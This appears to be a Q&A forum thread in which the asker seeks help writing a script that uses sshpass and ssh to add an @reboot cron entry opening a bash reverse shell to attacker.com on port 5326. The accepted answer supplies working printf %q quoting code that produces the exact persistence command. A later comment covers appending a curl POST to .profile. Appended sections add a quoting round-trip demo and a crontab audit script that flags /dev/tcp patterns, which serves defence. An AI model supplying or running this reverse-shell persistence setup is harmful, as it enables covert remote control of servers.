-2

I have a script to update the cron job in a remote server accessed by ssh. I can't get the single quote to be put into the cron job from the echo command running in my bash script.

This is the exact string I need in my cron job:

'bash -i >& /dev/tcp/attacker.com/5326 0>&1'

But I can't get them to "stick."

This is the line in my script (other lines are working just fine).

sshpass -p 'PASSWORD' ssh -t -o StrictHostKeyChecking=no REMOTEUSERNAME@HOSTNAME "rm TEMPFILENAME;touch TEMPFILENAME;crontab -l > TEMPFILENAME;echo @reboot /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1' >> TEMPFILENAME; crontab TEMPFILENAME"

The result of this attempt is ...

@reboot /bin/bash -c bash -i >& /dev/tcp/attacker.com/5326 0>&1

... with the quotes missing.

I have tried multiple double quotes. Single quotes within double quotes. Slashes.

In this situation, how can I put single quotes in my script so they end up in the cron job?

C0ntr07

2 Answers

0

If you don't need it to be pretty, you can ask Bash to do it:

#!/bin/bash
# The raw command that the final `bash -c` should receive.
cmd='bash -i >& /dev/tcp/attacker.com/5326 0>&1'
# Layer 1: quote it so cron's shell hands it to `bash -c` as one word.
crontab=$(printf "@reboot bash -c %q" "$cmd")
# Layer 2: quote that line so the remote shell's echo writes it out verbatim.
echo=$(printf "echo %q >> TEMPFILENAME" "$crontab")
# Layer 3: quote the echo command so the local shell passes it to ssh intact.
ssh=$(printf "ssh localhost %q" "$echo")
printf 'The command to run is:\n%s\n' "$ssh"

The output of this script is:

The command to run is:
ssh localhost echo\ @reboot\\\ bash\\\ -c\\\ bash\\\\\\\ -i\\\\\\\ \\\\\\\>\\\\\\\&\\\\\\\ /dev/tcp/attacker.com/5326\\\\\\\ 0\\\\\\\>\\\\\\\&1\ \>\>\ TEMPFILENAME

And indeed, if you copy-paste that command, you will find a file TEMPFILENAME containing:

@reboot bash -c bash\ -i\ \>\&\ /dev/tcp/attacker.com/5326\ 0\>\&1

This, in turn, when copy-pasted into a prompt, will set up the reverse shell.

that other guy
  • Thanks! I’ll give this a try tonight since I have to run this Lab tomorrow with my class. – C0ntr07 Apr 15 '19 at 21:37
  • THANK YOU. I've been trying to understand the %q control and find less than optimal documentation. So now I'm lost when I need to execute `echo "curl -X POST -H "Content-Type: application/json" -d '{"value1":"PHONENUMBER","value2":"MESSAGE"}' https://maker.ifttt.com/trigger/TRIGGER/with/key/KEY &> /dev/null" >> .profile` in a script. Are there logical breakpoints I should be considering to break up the command before using `printf`? What should I be considering for `"` and `'`? – C0ntr07 May 06 '19 at 11:44
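The answer above applies printf %q once per shell that will parse the string (the local shell, the remote login shell started by ssh, and cron's sh). The script below is an added example, not code from the answer or the question: it wraps a harmless constructed command in N quoting layers the same way, then peels the layers off again with one `bash -c` per layer, so you can confirm the command round-trips before sending it anywhere. It assumes bash is installed (printf %q is a bash feature; the helpers call bash explicitly so the script itself runs under plain sh), and the inner command, its function names and the LAYERS value are constructed for this example.

```shell
# quote_layers CMD N: add N layers of shell quoting, one per shell that
# will parse the string on its way to the final `bash -c`.
quote_layers() {
    local cmd=$1 n=$2 i=0
    while [ "$i" -lt "$n" ]; do
        # bash's printf %q escapes exactly one layer; invoked via bash so
        # this works even when the script runs under /bin/sh (constructed helper)
        cmd=$(bash -c 'printf %q "$1"' _ "$cmd")
        i=$((i + 1))
    done
    printf '%s' "$cmd"
}

# unwrap_layers QUOTED N: simulate N shells each parsing the string once.
# Each `bash -c` parses its command line, strips one layer, and prints
# the single word that results.
unwrap_layers() {
    local quoted=$1 n=$2 i=0
    while [ "$i" -lt "$n" ]; do
        quoted=$(bash -c "printf '%s' $quoted")
        i=$((i + 1))
    done
    printf '%s' "$quoted"
}

# run_through_layers CMD N: quote, unwrap, verify the round trip, then run
# the recovered command in a final `bash -c`, as cron's sh -> bash -c would.
run_through_layers() {
    local cmd=$1 n=$2 unwrapped
    unwrapped=$(unwrap_layers "$(quote_layers "$cmd" "$n")" "$n")
    if [ "$unwrapped" != "$cmd" ]; then
        echo "quoting did not round-trip after $n layers" >&2
        return 1
    fi
    bash -c "$unwrapped"
}

# Constructed harmless inner command containing the characters that break
# naive quoting: single quotes, spaces, a pipe and a redirection operator.
INNER="printf '%s|%s\n' 'a b' 'c d' 2>&1"

# In the answer's scenario three shells parse the string before bash -c
# executes it: local shell, remote login shell, cron's sh. So three layers.
LAYERS=3

run_through_layers "$INNER" "$LAYERS"
```

If the round-trip check fails, the number of layers does not match the number of shells in the path; counting those shells is the whole trick, and the same check catches an extra or missing one before it reaches a crontab.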
-1

Can you try after escaping the single quotes with a '\' ?

sshpass -p 'PASSWORD' ssh -t -o StrictHostKeyChecking=no REMOTEUSERNAME@HOSTNAME "rm TEMPFILENAME;touch TEMPFILENAME;crontab -l > TEMPFILENAME;echo @reboot /bin/bash -c \'bash -i >& /dev/tcp/attacker.com/5326 0>&1\' >> TEMPFILENAME; crontab TEMPFILENAME"
BlackPearl
  • Well, that's a good question - can you explain what "this" does and why you think that it might solve the problem? Keep in mind that such an explanation helps others to learn from your answer – Nico Haase Mar 31 '19 at 20:17
  • Sadly, this doesn't work. I am completely _flummoxed_ by this. By the way `\'` didn't work, neither did `'\'` and `'\"` was no good. I also tried `"\'"` along with `'\"` as well as `\''`. I'm willing to try all ideas anyone has. – C0ntr07 Mar 31 '19 at 21:00
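The cron entry this thread is building is a bash reverse shell over the /dev/tcp pseudo-device, installed with @reboot so it survives restarts. On hosts you administer, the corresponding check is to audit crontab listings for that pattern. The script below is an added defensive example, not part of the question or either answer: it scans crontab text on stdin for /dev/tcp or /dev/udp connections to a host and port, reporting line numbers and failing when any are found. The sample crontab is constructed for the example (the flagged line is the one from the accepted answer, with the page's attacker.com and port 5326 as the sample host and port), and the function and variable names are assumptions.

```shell
# Matches bash's /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT pseudo-device
# paths, which appear in both the plain and the %q-escaped forms of the
# reverse-shell command on this page.
REVSHELL_PATTERN='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# count_reverse_shell_hits: read crontab text on stdin, print how many
# lines match (0 when none; grep's non-zero status for "no match" is ignored).
count_reverse_shell_hits() {
    grep -c -E "$REVSHELL_PATTERN" || :
}

# audit_crontab: read crontab text on stdin; print each matching line with
# its line number and return 1 if anything matched, 0 if the listing is clean.
audit_crontab() {
    local hits
    hits=$(grep -n -E "$REVSHELL_PATTERN" || :)
    if [ -z "$hits" ]; then
        return 0
    fi
    printf '%s\n' "$hits" | sed 's/^/FLAG line /'
    return 1
}

# Constructed sample crontab: two ordinary jobs plus the %q-escaped entry
# from the accepted answer above.
SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
@reboot bash -c bash\ -i\ \>\&\ /dev/tcp/attacker.com/5326\ 0\>\&1
*/5 * * * * curl -s https://example.com/health >/dev/null'

# Constructed clean crontab for comparison.
CLEAN_CRONTAB='0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s https://example.com/health >/dev/null'

# Usage on a real host: crontab -l | audit_crontab
# (also worth running over /etc/crontab and the /etc/cron.* directories).
printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab || echo "suspicious cron entry found"
```

The pattern is deliberately narrow (only the /dev/tcp and /dev/udp form discussed on this page), so it reports no false positives on ordinary jobs; treat a hit as a reason to look at the whole line, including who installed it and when.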